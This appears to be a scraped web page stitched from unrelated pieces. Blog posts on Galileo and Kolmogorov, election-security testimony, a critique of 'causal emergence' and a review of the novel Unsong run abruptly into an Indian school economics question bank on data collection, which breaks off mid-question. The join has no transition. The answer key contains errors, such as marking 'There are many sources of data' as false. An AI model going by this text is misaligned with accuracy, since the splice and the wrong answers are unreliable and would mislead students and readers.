• The Amendment to the Law is that I’ll go to great lengths not to hurt anyone else’s feelings: for example, by propagating negative stereotypes, or by saying anything that might discourage any enthusiastic person from entering science. And if I don’t understand what is or isn’t hurtful, then I’ll defer to the leading intellectuals in my culture to tell me. This Amendment often overrides the Law, causing me to bite my tongue.
• The Amendment to the Amendment is that, when pushed, I’ll stand by what I care about—such as free scientific inquiry, liberal Enlightenment norms, humor, clarity, and the survival of the planet and of family and friends and colleagues and nerdy misfits wherever they might be found. So if someone puts me in a situation where there’s no way to protect what I care about without speaking a truth that hurts someone’s feelings, then I might speak the truth, feelings be damned. (Even then, though, I’ll try to minimize collateral damage.)
When I see social media ablaze with this or that popular falsehood, I sometimes feel the “Galileo urge” washing over me. I think: I’m a tenured professor with a semi-popular blog. How can I look myself in the mirror, if I won’t use my platform and relative job safety to declare to the world, “and yet it moves”?
But then I remember that even Galileo weighed his options and tried hard to be prudent. In his mind, the Dialogue Concerning the Two Chief World Systems actually represented a compromise (!). Galileo never declared outright that the earth orbits the sun. Instead, he put the Copernican doctrine, as a “possible view,” into the mouth of his character Salviati—only to have Simplicio “refute” Salviati, by the final dialogue, with the argument that faith always trumps reason, and that human beings are pathetically unequipped to deduce the plan of God from mere surface appearances. Then, when that fig-leaf turned out not to be wide enough to fool the Church, Galileo quickly capitulated. He repented of his error, and agreed never to defend the Copernican heresy again. And he didn’t, at least not publicly.
Some have called Galileo a coward for that. But the great David Hilbert held a different view. Hilbert said that science, unlike religion, has no need for martyrs, because it’s based on facts that can’t be denied indefinitely. Given that, Hilbert considered Galileo’s response to be precisely correct: in effect Galileo told the Inquisitors, hey, you’re the ones with the torture rack. Just tell me which way you want it. I can have the earth orbiting Mars and Venus in figure-eights by tomorrow if you decree it so.
Three hundred years later, Andrey Kolmogorov would say to the Soviet authorities, in so many words: hey, you’re the ones with the Gulag and secret police. Consider me at your service. I’ll even help you stop Hitler’s ideology from taking over the world—you’re 100% right about that one, I’ll give you that. Now as for your own wondrous ideology: just tell me the dogma of the week, and I’ll try to make sure Soviet mathematics presents no threat to it.
There’s a quiet dignity to Kolmogorov’s (and Galileo’s) approach: a dignity that I suspect will be alien to many, but recognizable to those in the business of science.
Comment Policy: I welcome discussion about the responses of Galileo, Kolmogorov, and other historical figures to official ideologies that they didn’t believe in; and about the meta-question of how a truth-valuing person ought to behave when living under such ideologies. In the hopes of maintaining a civil discussion, any comments that mention current hot-button ideological disputes will be ruthlessly deleted.
### Alex Halderman testifying before the Senate Intelligence Committee
Wednesday, June 21st, 2017
This morning, my childhood best friend Alex Halderman testified before the US Senate about the proven ease of hacking electronic voting machines without leaving any record, the certainty that Russia has the technical capability to hack American elections, and the urgency of three commonsense (and cheap) countermeasures:
1. a paper trail for every vote cast in every state,
2. routine statistical sampling of the paper trail—enough to determine whether large-scale tampering occurred, and
3. cybersecurity audits to instill general best practices (such as firewalling election systems).
You can watch Alex on C-SPAN here—his testimony begins at 2:16:13, and is followed by the Q&A period. You can also read Alex’s prepared testimony here, as well as his accompanying Washington Post editorial (joint with Justin Talbot-Zorn).
Alex’s testimony—its civic, nonpartisan nature, right down to Alex’s flourish of approvingly quoting President Trump in support of paper ballots—reflects a moving optimism that, even in these dark times for democracy, Congress can be prodded into doing the right thing merely because it’s clearly, overwhelmingly in the national interest. I wish I could say I shared that optimism. Nevertheless, when called to testify, what can one do but act on the assumption that such optimism is justified? Here’s hoping that Alex’s urgent message is heard and acted on.
### Higher-level causation exists (but I wish it didn’t)
Sunday, June 4th, 2017
Unrelated Update (June 6): It looks like the issues we’ve had with commenting have finally been fixed! Thanks so much to Christie Wright and others at WordPress Concierge Services for handling this. Let me know if you still have problems. In the meantime, I also stopped asking for commenters’ email addresses (many commenters filled that field with nonsense anyway). Oops, that ended up being a terrible idea, because it made commenting impossible! Back to how it was before.
Update (June 5): Erik Hoel was kind enough to write a 5-page response to this post (Word .docx format), and to give me permission to share it here. I might respond to various parts of it later. For now, though, I’ll simply say that I stand by what I wrote, and that requiring the macro-distribution to arise by marginalizing the micro-distribution still seems like the correct choice to me (and is what’s assumed in, e.g., the proof of the data processing inequality). But I invite readers to read my post along with Erik’s response, form their own opinions, and share them in the comments section.
This past Thursday, Natalie Wolchover—a math/science writer whose work has typically been outstanding—published a piece in Quanta magazine entitled “A Theory of Reality as More Than the Sum of Its Parts.” The piece deals with recent work by Erik Hoel and his collaborators, including Giulio Tononi (Hoel’s adviser, and the founder of integrated information theory, previously critiqued on this blog). Commenter Jim Cross asked me to expand on my thoughts about causal emergence in a blog post, so: your post, monsieur.
In their new work, Hoel and others claim to make the amazing discovery that scientific reductionism is false—or, more precisely, that there can exist “causal information” in macroscopic systems, information relevant for predicting the systems’ future behavior, that’s not reducible to causal information about the systems’ microscopic building blocks. For more about what we’ll be discussing, see Hoel’s FQXi essay “Agent Above, Atom Below,” or better yet, his paper in Entropy, When the Map Is Better Than the Territory. Here’s the abstract of the Entropy paper:
The causal structure of any system can be analyzed at a multitude of spatial and temporal scales. It has long been thought that while higher scale (macro) descriptions may be useful to observers, they are at best a compressed description and at worst leave out critical information and causal relationships. However, recent research applying information theory to causal analysis has shown that the causal structure of some systems can actually come into focus and be more informative at a macroscale. That is, a macroscale description of a system (a map) can be more informative than a fully detailed microscale description of the system (the territory). This has been called “causal emergence.” While causal emergence may at first seem counterintuitive, this paper grounds the phenomenon in a classic concept from information theory: Shannon’s discovery of the channel capacity. I argue that systems have a particular causal capacity, and that different descriptions of those systems take advantage of that capacity to various degrees. For some systems, only macroscale descriptions use the full causal capacity. These macroscales can either be coarse-grains, or may leave variables and states out of the model (exogenous, or “black boxed”) in various ways, which can improve the efficacy and informativeness via the same mathematical principles of how error-correcting codes take advantage of an information channel’s capacity. The causal capacity of a system can approach the channel capacity as more and different kinds of macroscales are considered. Ultimately, this provides a general framework for understanding how the causal structure of some systems cannot be fully captured by even the most detailed microscale description.
Anyway, Wolchover’s popular article quoted various researchers praising the theory of causal emergence, as well as a single inexplicably curmudgeonly skeptic—some guy who sounded like he was so off his game (or maybe just bored with debates about ‘reductionism’ versus ’emergence’?), that he couldn’t even be bothered to engage the details of what he was supposed to be commenting on.
Hoel’s ideas do not impress Scott Aaronson, a theoretical computer scientist at the University of Texas, Austin. He says causal emergence isn’t radical in its basic premise. After reading Hoel’s recent essay for the Foundational Questions Institute, “Agent Above, Atom Below” (the one that featured Romeo and Juliet), Aaronson said, “It was hard for me to find anything in the essay that the world’s most orthodox reductionist would disagree with. Yes, of course you want to pass to higher abstraction layers in order to make predictions, and to tell causal stories that are predictively useful — and the essay explains some of the reasons why.”
After the Quanta piece came out, Sean Carroll tweeted approvingly about the above paragraph, calling me a “voice of reason [yes, Sean; have I ever not been?], slapping down the idea that emergent higher levels have spooky causal powers.” Then Sean, in turn, was criticized for that remark by Hoel and others.
Hoel in particular raised a reasonable-sounding question. Namely, in my “curmudgeon paragraph” from Wolchover’s article, I claimed that the notion of “causal emergence,” or causality at the macro-scale, says nothing fundamentally new. Instead it simply reiterates the usual worldview of science, according to which
1. the universe is ultimately made of quantum fields evolving by some Hamiltonian, but
2. if someone asks (say) “why has air travel in the US gotten so terrible?”, a useful answer is going to talk about politics or psychology or economics or history rather than the movements of quarks and leptons.
But then, Hoel asks, if there’s nothing here for the world’s most orthodox reductionist to disagree with, then how do we find Carroll and other reductionists … err, disagreeing?
I think this dilemma is actually not hard to resolve. Faced with a claim about “causation at higher levels,” what reductionists disagree with is not the object-level claim that such causation exists (I scratched my nose because it itched, not because of the Standard Model of elementary particles). Rather, they disagree with the meta-level claim that there’s anything shocking about such causation, anything that poses a special difficulty for the reductionist worldview that physics has held for centuries. I.e., they consider it true both that
1. my nose is made of subatomic particles, and its behavior is in principle fully determined (at least probabilistically) by the quantum state of those particles together with the laws governing them, and
2. my nose itched.
At least if we leave the hard problem of consciousness out of it—that’s a separate debate—there seems to be no reason to imagine a contradiction between 1 and 2 that needs to be resolved, but “only” a vast network of intervening mechanisms to be elucidated. So, this is how it is that reductionists can find anti-reductionist claims to be both wrong and vacuously correct at the same time.
(Incidentally, yes, quantum entanglement provides an obvious sense in which “the whole is more than the sum of its parts,” but even in quantum mechanics, the whole isn’t more than the density matrix, which is still a huge array of numbers evolving by an equation, just different numbers than one would’ve thought a priori. For that reason, it’s not obvious what relevance, if any, QM has to reductionism versus anti-reductionism. In any case, QM is not what Hoel invokes in his causal emergence theory.)
From reading the philosophical parts of Hoel’s papers, it was clear to me that some remarks like the above might help ward off the forehead-banging confusions that these discussions inevitably provoke. So standard-issue crustiness is what I offered Natalie Wolchover when she asked me, not having time on short notice to go through the technical arguments.
But of course this still leaves the question: what is in the mathematical part of Hoel’s Entropy paper? What exactly is it that the advocates of causal emergence claim provides a new argument against reductionism?
To answer that question, yesterday I (finally) read the Entropy paper all the way through.
Much like Tononi’s integrated information theory was built around a numerical measure called Φ, causal emergence is built around a different numerical quantity, this one supposed to measure the amount of “causal information” at a particular scale. The measure is called effective information or EI, and it’s basically the mutual information between a system’s initial state s_I and its final state s_F, assuming a uniform distribution over s_I. Much like with Φ in IIT, computations of this EI are then used as the basis for wide-ranging philosophical claims—even though EI, like Φ, has aspects that could be criticized as arbitrary, and as not obviously connected with what we’re trying to understand.
Once again like with Φ, one of those assumptions is that of a uniform distribution over one of the variables, sI, whose relatedness we’re trying to measure. In my IIT post, I remarked on that assumption, but I didn’t harp on it, since I didn’t see that it did serious harm, and in any case my central objection to Φ would hold regardless of which distribution we chose. With causal emergence, by contrast, this uniformity assumption turns out to be the key to everything.
For here is the argument from the Entropy paper, for the existence of macroscopic causality that’s not reducible to causality in the underlying components. Suppose I have a system with 8 possible states (called “microstates”), which I label 1 through 8. And suppose the system evolves as follows: if it starts out in states 1 through 7, then it goes to state 1. If, on the other hand, it starts in state 8, then it stays in state 8. In such a case, it seems reasonable to “coarse-grain” the system, by lumping together initial states 1 through 7 into a single “macrostate,” call it A, and letting the initial state 8 comprise a second macrostate, call it B.
We now ask: how much information does knowing the system’s initial state tell you about its final state? If we’re talking about microstates, and we let the system start out in a uniform distribution over microstates 1 through 8, then 7/8 of the time the system goes to state 1. So there’s just not much information about the final state to be predicted—specifically, only 7/8×log2(8/7) + 1/8×log2(8) ≈ 0.54 bits of entropy—which, in this case, is also the mutual information between the initial and final microstates. If, on the other hand, we’re talking about macrostates, and we let the system start in a uniform distribution over macrostates A and B, then A goes to A and B goes to B. So knowing the initial macrostate gives us 1 full bit of information about the final state, which is more than the ~0.54 bits that looking at the microstate gave us! Ergo reductionism is false.
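The arithmetic in this example is easy to check. Here is a minimal Python sketch (my own illustration, not code from the paper); because the dynamics are deterministic, the mutual information between initial and final state equals the entropy of the final-state distribution:

```python
import math

def entropy(dist):
    """Shannon entropy, in bits, of a probability distribution."""
    return -sum(p * math.log2(p) for p in dist if p > 0)

# Microscale: states 1..8; the dynamics send 1-7 to 1 and keep 8 at 8.
# With a uniform distribution over initial microstates and deterministic
# dynamics, the mutual information I(s_I; s_F) equals H(s_F).
micro_EI = entropy([7/8, 1/8])   # P(final = 1), P(final = 8)
print(round(micro_EI, 3))        # 0.544

# Macroscale: A = {1,...,7}, B = {8}; A goes to A, B goes to B.
# Imposing a uniform distribution over the two macrostates:
macro_EI = entropy([1/2, 1/2])
print(macro_EI)                  # 1.0

# Coarse-graining the uniform microstate distribution instead gives
# P(A) = 7/8, P(B) = 1/8, and the macro figure falls back to ~0.544:
coarse_EI = entropy([7/8, 1/8])
```

The last two lines make the normalization point concrete: the apparent gain at the macroscale appears only when the macro-distribution is re-uniformized rather than inherited from the micro one.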
Once the argument is spelled out, it’s clear that the entire thing boils down to, how shall I put this, a normalization issue. That is: we insist on the uniform distribution over microstates when calculating microscopic EI, and we also insist on the uniform distribution over macrostates when calculating macroscopic EI, and we ignore the fact that the uniform distribution over microstates gives rise to a non-uniform distribution over macrostates, because some macrostates can be formed in more ways than others. If we fixed this, demanding that the two distributions be compatible with each other, we’d immediately find that, surprise, knowing the complete initial microstate of a system always gives you at least as much power to predict the system’s future as knowing a macroscopic approximation to that state. (How could it not? For given the microstate, we could in principle compute the macroscopic approximation for ourselves, but not vice versa.)
The closest the paper comes to acknowledging the problem—i.e., that it’s all just a normalization trick—seems to be the following paragraph in the discussion section:
Another possible objection to causal emergence is that it is not natural but rather enforced upon a system via an experimenter’s application of an intervention distribution, that is, from using macro-interventions. For formalization purposes, it is the experimenter who is the source of the intervention distribution, which reveals a causal structure that already exists. Additionally, nature itself may intervene upon a system with statistical regularities, just like an intervention distribution. Some of these naturally occurring input distributions may have a viable interpretation as a macroscale causal model (such as being equal to Hmax [the maximum entropy] at some particular macroscale). In this sense, some systems may function over their inputs and outputs at a microscale or macroscale, depending on their own causal capacity and the probability distribution of some natural source of driving input.
As far as I understand it, this paragraph is saying that, for all we know, something could give rise to a uniform distribution over macrostates, so therefore that’s a valid thing to look at, even if it’s not what we get by taking a uniform distribution over microstates and then coarse-graining it. Well, OK, but unknown interventions could give rise to many other distributions over macrostates as well. In any case, if we’re directly comparing causal information at the microscale against causal information at the macroscale, it still seems reasonable to me to demand that in the comparison, the macro-distribution arise by coarse-graining the micro one. But in that case, the entire argument collapses.
Despite everything I said above, the real purpose of this post is to announce that I’ve changed my mind. I now believe that, while Hoel’s argument might be unsatisfactory, the conclusion is fundamentally correct: scientific reductionism is false. There is higher-level causation in our universe, and it’s 100% genuine, not just a verbal sleight-of-hand. In particular, there are causal forces that can only be understood in terms of human desires and goals, and not in terms of subatomic particles blindly bouncing around.
So what caused such a dramatic conversion?
By 2015, after decades of research and diplomacy and activism and struggle, 196 nations had finally agreed to limit their carbon dioxide emissions—every nation on earth besides Syria and Nicaragua, and Nicaragua only because it thought the agreement didn’t go far enough. The human race had thereby started to carve out some sort of future for itself, one in which the oceans might rise slowly enough that we could adapt, and maybe buy enough time until new technologies were invented that changed the outlook. Of course the Paris agreement fell far short of what was needed, but it was a start, something to build on in the coming decades. Even in the US, long the hotbed of intransigence and denial on this issue, 69% of the public supported joining the Paris agreement, compared to a mere 13% who opposed. Clean energy was getting cheaper by the year. Most of the US’s largest corporations, including Google, Microsoft, Apple, Intel, Mars, PG&E, and ExxonMobil—ExxonMobil, for godsakes—vocally supported staying in the agreement and working to cut their own carbon footprints. All in all, there was reason to be cautiously optimistic that children born today wouldn’t live to curse their parents for having brought them into a world so close to collapse.
In order to unravel all this, in order to steer the heavy ship of destiny off the path toward averting the crisis and toward the path of existential despair, a huge number of unlikely events would need to happen in succession, as if propelled by some evil supernatural force.
Like what? I dunno, maybe a fascist demagogue would take over the United States on a campaign based on willful cruelty, on digging up and burning dirty fuels just because and even if it made zero economic sense, just for the fun of sticking it to liberals, or because of the urgent need to save the US coal industry, which employs fewer people than Arby’s. Such a demagogue would have no chance of getting elected, you say?
So let’s suppose he’s up against a historically unpopular opponent. Let’s suppose that even then, he still loses the popular vote, but somehow ekes out an Electoral College win. Maybe he gets crucial help in winning the election from a hostile foreign power—and for some reason, pro-American nationalists are totally OK with that, even cheer it. Even then, we’d still probably need a string of additional absurd coincidences. Like, I dunno, maybe the fascist’s opponent has an aide who used to be married to a guy who likes sending lewd photos to minors, and investigating that guy leads the FBI to some emails that ultimately turn out to mean nothing whatsoever, but that the media hyperventilate about precisely in time to cause just enough people to vote to bring the fascist to power, thereby bringing about the end of the world. Something like that.
It’s kind of like, you know that thing where the small population in Europe that produced Einstein and von Neumann and Erdös and Ulam and Tarski and von Karman and Polya was systematically exterminated (along with millions of other innocents) soon after it started producing such people, and the world still hasn’t fully recovered? How many things needed to go wrong for that to happen? Obviously you needed Hitler to be born, and to survive the trenches and assassination plots; and Hindenburg to make the fateful decision to give Hitler power. But beyond that, the world had to sleep as Germany rebuilt its military; every last country had to turn away refugees; the UK had to shut down Jewish immigration to Palestine at exactly the right time; newspapers had to bury the story; government record-keeping had to have advanced just to the point that rounding up millions for mass murder was (barely) logistically possible; and finally, the war had to continue long enough for nearly every European country to have just enough time to ship its Jews to their deaths, before the Allies showed up to liberate mostly the ashes.
In my view, these simply aren’t the sort of outcomes that you expect from atoms blindly interacting according to the laws of physics. These are, instead, the signatures of higher-level causation—and specifically, of a teleological force that operates in our universe to make it distinctively cruel and horrible.
Admittedly, I don’t claim to know the exact mechanism of the higher-level causation. Maybe, as the physicist Yakir Aharonov has advocated, our universe has not only a special, low-entropy initial state at the Big Bang, but also a “postselected final state,” toward which the outcomes of quantum measurements get mysteriously “pulled”—an effect that might show up in experiments as ever-so-slight deviations from the Born rule. And because of the postselected final state, even if the human race naïvely had only (say) a one-in-thousand chance of killing itself off, even if the paths to its destruction all involved some improbable absurdity, like an orange clown showing up from nowhere—nevertheless, the orange clown would show up. Alternatively, maybe the higher-level causation unfolds through subtle correlations in the universe’s initial state, along the lines I sketched in my 2013 essay The Ghost in the Quantum Turing Machine. Or maybe Erik Hoel is right after all, and it all comes down to normalization: if we looked at the uniform distribution over macrostates rather than over microstates, we’d discover that orange clowns destroying the world predominated. Whatever the details, though, I think it can no longer be doubted that we live, not in the coldly impersonal universe that physics posited for centuries, but instead in a tragicomically evil one.
I call my theory reverse Hollywoodism, because it holds that the real world has the inverse of the typical Hollywood movie’s narrative arc. Again and again, what we observe is that the forces of good have every possible advantage, from money to knowledge to overwhelming numerical superiority. Yet somehow good still fumbles. Somehow a string of improbable coincidences, or a black swan or an orange Hitler, show up at the last moment to let horribleness eke out a last-minute victory, as if the world itself had been rooting for horribleness all along. That’s our universe.
I’m fine if you don’t believe this theory: maybe you’re congenitally more optimistic than I am (in which case, more power to you); maybe the full weight of our universe’s freakish awfulness doesn’t bear down on you as it does on me. But I hope you’ll concede that, if nothing else, this theory is a genuinely non-reductionist one.
### Unsong of unsongs
Saturday, May 20th, 2017
On Wednesday, Scott Alexander finally completed his sprawling serial novel Unsong, after a year and a half of weekly updates—incredibly, in his spare time while also working as a full-time resident in psychiatry, and also regularly updating Slate Star Codex, which I consider to be the world’s best blog. I was honored to attend a party in Austin (mirroring parties in San Francisco, Boston, Tel Aviv, and elsewhere) to celebrate Alexander’s release of the last chapter—depending on your definition, possibly the first “fan event” I’ve ever attended.
Like many other nerds I’ve met, I’d been following Unsong almost since the beginning—with its mix of Talmudic erudition, CS humor, puns, and even a shout-out to Quantum Computing Since Democritus (which shows up as Ben Aharon’s Gematria Since Adam), how could I not be? I now count Unsong as one of my favorite works of fiction, and Scott Alexander alongside Rebecca Newberger Goldstein among my favorite contemporary novelists. The goal of this post is simply to prod readers of my blog who don’t yet know Unsong: if you’ve ever liked anything here on Shtetl-Optimized, then I predict you’ll like Unsong, and probably more.
[WARNING: SPOILERS FOLLOW]
Though not trivial to summarize, Unsong is about a world where the ideas of religion and mysticism—all of them, more or less, although with a special focus on kabbalistic Judaism—turn out to be true. In 1968, the Apollo 8 mission leads not to an orbit of the Moon, as planned, but instead to cracking an invisible crystal sphere that had surrounded the Earth for millennia. Down through the crack rush angels, devils, and other supernatural forces. Life on Earth becomes increasingly strange: on the one hand, many technologies stop working; on the other, people can now gain magical powers by speaking various names of God. A worldwide industry arises to discover new names of God by brute-force search through sequences of syllables. And a powerful agency, the eponymous UNSONG (United Nations Subcommittee on Names of God), is formed to enforce kabbalistic copyright law, hunting down and punishing anyone who speaks divine names without paying licensing fees to the theonomic corporations.
As the story progresses, we learn that eons ago, there was an epic battle in Heaven between Good and Evil, and Evil had the upper hand. But just as all seemed lost, an autistic angel named Uriel reprogrammed the universe to run on math and science rather than on God’s love, as a last-ditch strategy to prevent Satan’s forces from invading the sublunary realm. Molecular biology, the clockwork regularity of physical laws, false evidence for a huge and mindless cosmos—all these were retconned into the world’s underpinnings. Uriel did still need to be occasionally involved, but less as a loving god than as an overworked sysadmin: for example, he descended to Mount Sinai to warn humans never to boil goats in their mothers’ milk, because he discovered that doing so (like the other proscribed activities in the Torah, Uriel’s readme file) triggered bugs in the patchwork of code that was holding the universe together. Now that the sky has cracked, Uriel is forced to issue increasingly desperate patches, and even those will only buy a few decades until his math-and-science-based world stops working entirely, with Satan again triumphant.
Anyway, that’s a tiny part of the setup. Through 72 chapters and 22 interludes, there’s world-building and philosophical debates and long kabbalistic digressions. There are battle sequences (the most striking involves the Lubavitcher Rebbe riding atop a divinely-animated Statue of Liberty like a golem). There’s wordplay and inside jokes—holy of holies are there those—including, notoriously, a sequence of cringe-inducing puns involving whales. But in this story, wordplay isn’t just there for the hell of it: Scott Alexander has built an entire fictional universe that runs on wordplay—one where battles between the great masters, the equivalent of the light-saber fights in Star Wars, are conducted by rearranging letters in the sky to give them new meanings. Scott A. famously claims he’s bad at math (though if you read anything he’s written on statistics or logic puzzles, it’s clear he undersells himself). One could read Unsong as Alexander’s book-length answer to the question: what could it mean for the world to be law-governed but not mathematical? What if the Book of Nature were written in English, or Hebrew, or other human languages, and if the Newtons and Einsteins were those who were most adept with words?
I should confess that for me, the experience of reading Unsong was colored by the knowledge that, in his years of brilliant and prolific writing, lighting up the blogosphere like a comet, the greatest risk Scott Alexander ever took (by his own account) was to defend me. It’s like, imagine that in Elizabethan England, you were placed in the stocks and jeered at by thousands for advocating some unpopular loser cause—like, I dunno, anti-cat-burning or something. And imagine that, when it counted, your most eloquent supporter was a then-obscure poet from Stratford-upon-Avon. You’d be grateful to the poet, of course; you might even become a regular reader of his work, even if it wasn’t good. But if the same poet went on to write Hamlet or Macbeth? It might almost be enough for you to volunteer to be scorned and pilloried all over again, just for the honor of having the Bard divert a rivulet of his creative rapids to protesting on your behalf.
Yes, a tiny part of me had a self-absorbed child’s reaction to Unsong: “could Amanda Marcotte have written this? could Arthur Chu? who better to have in your camp: the ideologues du jour of Twitter and Metafilter, Salon.com and RationalWiki? Or a lone creative genius, someone who can conjure whole worlds into being, as though graced himself with the Shem haMephorash of which he writes?” Then of course I’d catch myself, and think: no, if you want to be in Scott Alexander’s camp, then the only way to do it is to be in nobody’s camp. If two years ago it was morally justified to defend me, then the reasons why have nothing to do with the literary gifts of any of my defenders. And conversely, the least we can do for Unsong is to judge it by what’s on the page, rather than as a soldier in some army fielded by the Gray Tribe.
So in that spirit, let me explain some of what’s wrong with Unsong. That it’s a first novel sometimes shows. It’s brilliant on world-building and arguments and historical tidbits and jokes, epic on puns, and uneven on character and narrative flow. The story jumps around spasmodically in time, so much so that I needed a timeline to keep track of what was happening. Subplots that are still open beget additional subplots ad headacheum, like a string of unmatched left-parentheses. Even more disorienting, the novel changes its mind partway through about its narrative core. Initially, the reader is given a clear sense that this is going to be a story about a young Bay Area kabbalist named Aaron Smith-Teller, his not-quite-girlfriend Ana, and their struggle for supernatural fair-use rights. Soon, though, Aaron and Ana become almost side characters, their battle against UNSONG just one subplot among many, as the focus shifts to the decades-long war between the Comet King, a messianic figure come to rescue humanity, and Thamiel, the Prince of Hell. For the Comet King, even saving the earth from impending doom is too paltry a goal to hold his interest much. As a strict utilitarian and fan of Peter Singer, the Comet King’s singleminded passion is destroying Hell itself, and thereby rescuing the billions of souls who are trapped there for eternity.
Anyway, unlike the Comet King, and unlike a certain other Scott A., I have merely human powers to marshal my time. I also have two kids and a stack of unwritten papers. So let me end this post now. If the post causes just one person to read Unsong who otherwise wouldn’t have, it will be as if I’ve nerdified the entire world.
### Me at the Science March today, in front of the Texas Capitol in Austin
Saturday, April 22nd, 2017
# 1st PUC Economics Question Bank Chapter 2 Collection of Data
Students can Download Economics Chapter 2 Collection of Data Questions and Answers, Notes Pdf, 1st PUC Economics Question Bank with Answers helps you to revise the complete Karnataka State Board Syllabus and score more marks in your examinations.
## Karnataka 1st PUC Economics Question Bank Chapter 2 Collection of Data
### 1st PUC Economics Collection of Data TextBook Questions and Answers
Question 1.
Frame at least four appropriate multiple-choice options for the following questions.
i) Which of the following is the most important when you buy a new dress?
1. Colour
2. Price
3. Brand
4. Quality of cloth
ii) How often do you use computers?
1. Every day
2. 6 times a week
3. 4 times a week
4. 2 times a week
iii) Which of the following newspapers do you read regularly?
• The Times of India
• The Hindu
• Indian Express
• Any other.
iv) Is the rise in the price of petrol justified?
• Yes
• No
• Don’t Know
• None of the above.
v) What is the monthly income of your family?
1. Less than Rs. 10,000
2. Rs. 10,000 to Rs.20,000
3. Rs.20,000 to Rs.30,000
4. More than Rs.30,000
Question 2.
Frame five two-way questions (with ‘yes’ or ‘no’)
1. Do you own a car?
2. Do you smoke?
3. Do you own a two-wheeler?
4. Have you visited any foreign country?
5. Are you satisfied with your present income?
Question 3.
State whether the following statements are true or false:
i) There are many sources of data (true/false)
False.
ii) Telephone survey is the most suitable method of collecting data, when the population is literate and spread over a large area (true/false)
False.
iii) Data collected by investigator is called the secondary data (true/false).
False.
iv) There is a certain bias involved in the non-random selection of samples (true/false)
True.
v) Non-sampling errors can be minimised by taking large samples (true / false)
False.
Question 4.
What do you think about the following questions? Do you find any problem with these questions? If yes, how?
i) How far do you live from the closest market?
The question is unclear: it does not specify the unit (distance in kilometres, or travel time) in which the answer should be given.
ii) If plastic bags are only 5 percent of our garbage, should it be banned?
The question is leading: by asserting that plastic bags are only 5 per cent of our garbage, it suggests to the respondent how to answer.
iii) Wouldn’t you be opposed to an increase in the price of petrol?
The question contains a double negative, which confuses respondents and may bias their answers.
iv)
1. Do you agree with use of chemical fertilisers?
2. Do you use fertilisers in your fields?
3. What is the yield per hectare in your fields?
The order of the questions is incorrect: a questionnaire should move from general questions to specific ones. The correct order should be:
1. What is the yield per hectare in your field?
2. Do you use fertilisers in your fields?
3. Do you agree with the use of chemical fertilisers?
Question 5.
You want to do research on the popularity of Vegetable Atta Noodles among children. Design a suitable questionnaire for collecting this information.
Name :_________________________
Age :_________
Sex :
1. Do you eat noodles?
2. Do you like Vegetable Atta Noodles more than other snacks?
3. How many packets do you consume in one month?
4. Do you prefer Atta noodles over Maida noodles?
5. Which vegetable according to you should be added in present Atta noodles?
_____________________________
6. When do you prefer to have vegetable Atta Noodles?
7. Do your parents accompany you while having noodles?
Question 6.
In a village of 200 farms, a study was conducted to find the cropping pattern. Out of the 50 farms surveyed, 50% grew only wheat. Identify the population and the sample here.
Population (or universe) in statistics means the totality of the items under study, so the population here is all 200 farms. A sample refers to a group or section of the population from which information is obtained. Since only 50 of the 200 farms were selected for the survey, the sample is those 50 farms.
Question 7.
Suppose there are 10 students in your class. You want to select three out of them. How many samples are possible?
Since the order of selection does not matter, the number of possible samples is C(10, 3) = (10 × 9 × 8) / (3 × 2 × 1) = 120.
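For a quick check, the number of 3-element subsets of a 10-element set can be computed directly (a sketch using the Python standard library):

```python
import math

# Choosing 3 students out of 10, order ignored, no repetition:
n_samples = math.comb(10, 3)
print(n_samples)  # 120
```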
Question 8.
Discuss how you would use the lottery method to select 3 students out of 10 in your class?
Selecting 3 students out of 10 by the lottery method can be done in the following way:
1. Make ten paper slips of equal size, writing one student’s name on each slip.
2. This gives ten identical slips, one per student.
3. Mix them well in a bowl.
4. Draw three slips at random, one by one, without replacement. The students whose names are drawn form the sample.
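The steps above amount to drawing without replacement, which can be simulated in a few lines (a sketch; the student names are placeholders):

```python
import random

# One paper slip per student, mixed and drawn without replacement.
students = [f"Student {i}" for i in range(1, 11)]
chosen = random.sample(students, 3)  # three distinct slips
print(chosen)
```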
Question 9.
Does the lottery method always give you a random sample? Explain.
The lottery method gives a truly random sample only if the slips are identical and thoroughly mixed, so that every item has an equal chance of being drawn; if these conditions are not met, the resulting sample may be biased.
Question 10.
Explain the procedure of selecting a random sample of 3 students out of 10 in your class, by using random number tables?
To select a random sample of 3 students out of 10 using a random number table, assign each student a one-digit serial number and read one-digit numbers from the table, skipping any number that does not correspond to a student and any number already drawn, until three distinct numbers are obtained. If, for example, the table yields 5, 9 and 2, then the students with serial numbers 5, 9 and 2 form the sample.
Question 11.
Do samples provide better results than surveys?
A sample survey can provide better results than a census survey because:
1. a sample can provide reasonably reliable and accurate information at a lower cost and in a shorter time;
2. as samples are smaller than the population, more detailed information can be collected through intensive enquiry;
3. a sample needs a smaller team of enumerators, so it is easier to train them and to supervise their work effectively.
1st PUC Economics Collection of Data Very Short Answer Type Questions
Question 1.
What is the purpose of data collection?
The purpose of data collection is to provide information regarding a specific topic or a problem.
Question 2.
What are economic variables?
Economic variables are measurable quantities whose values keep changing over time, e.g. the literacy rate, prices or national income.
Question 3.
Give the meaning of primary data?
When data are collected for the first time by an investigator or institution, they are called primary data.
Question 4.
What do you mean by personal interview?
When data are collected directly by the investigator from individuals through an interview, the method is called a personal interview.
Question 5.
Expand NSSO?
NSSO – National Sample Survey Organisation.
Question 6.
Expand CSO?
CSO – Central Statistical Office.
Question 7.
Expand CMIE?
CMIE – Centre for Monitoring Indian Economy.
Question 8.
What is Raw Data?
Data that have not been organised or classified are called raw data.
Question 9.
What is Quantitative Classification ?
When data are classified on the basis of measurable characteristics such as weight, height, income, age, production or marks, the classification is called quantitative classification.
Question 10.
What is Qualitative Classification?
When data are classified on the basis of attributes or qualities, the classification is called qualitative classification.
Question 11.
Give the formula for the calculation of a range?
Range = L – S
where L is the largest item and S is the smallest item.
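As a quick worked example with made-up values:

```python
# Range = L - S, where L is the largest and S the smallest observation.
data = [12, 7, 25, 18, 3]  # illustrative values
value_range = max(data) - min(data)
print(value_range)  # 25 - 3 = 22
```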
Question 12.
What do you mean by class limit?
Class limits are the two ends of a class interval: the lowest value is called the lower class limit and the highest value the upper class limit.
Question 13.
Give the meaning of frequency Array?
A frequency array is the classification of data for a discrete variable: it shows the frequency of each value of a variable that is not continuous.
Question 14.
Define secondary data?
When we use data that have already been collected by some other investigator or agency, they are called secondary data.
Question 15.
For an investigator, what kind of data are the figures published by the Railway department regarding the progress of railways?
Secondary data.
Question 16.
For the Government, what kind of data are the census of population and the national income estimates?
Primary data.
Question 17.
What are the main sources of data?
The main sources of data are:
• Primary data
• Secondary data.
Question 18.
Name any two methods of collecting primary data?
